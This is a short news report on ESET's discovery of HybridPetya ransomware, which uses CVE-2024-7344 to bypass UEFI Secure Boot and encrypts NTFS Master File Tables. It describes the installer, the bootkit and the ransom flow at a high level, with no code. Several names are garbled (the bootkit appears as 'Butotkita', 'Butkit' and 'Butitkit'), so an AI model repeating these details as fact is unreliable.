New Extortion Program Hybridpetya Emerges
Researchers from ESET reported the discovery of a new extortion program called Hybridpetya. This program combines techniques from the infamous Petya and Notpetya, and has the ability to bypass the Secure Boot mechanism in systems with UEFI. The attackers exploited a vulnerability, CVE-2024-7344, that was fixed in January 2025 to launch a fake EFI-made app without integrity checks.
Samples of the harmful code were first identified on VirusTotal in February 2025. Unlike previous versions of Petya, Hybridpetya is able to introduce its own EFI component into the EFI System Partition and use it to encrypt the Master File Table (MFT), which stores meta-information about all data on NTFS partitions. The program displays a fake message to the user about disk checking, while actually blocking access to the contents.
The malicious architecture consists of two main parts – the installer and Butotkita. Butotkita is responsible for reading configuration settings and controlling the encryption status using a flag with three values. The encryption process begins by encrypting the Verify file using the SALSA20 algorithm, creating a Counter file on the EFI partition, and then blocking all NTFS partitions.
Despite operating from February to May 2025, the attackers only received about $183 in payments to the specified address, which is now empty.
Upon payment, the victim receives a key to unlock the Verify file and change the flag value to “2”. Butkit then decrypts the clusters, restores the original bootloaders, and prompts the user to reboot Windows.
One notable feature of Hybridpetya is that the changes made by the installer result in a “blue screen” error during boot, ensuring the launch of the malicious EFI module at the next startup. The program exploits CVE-2024-7344 in the Howyar Reloader component, bypassing secure boot protection by loading the encrypted Butitkit without integrity checks.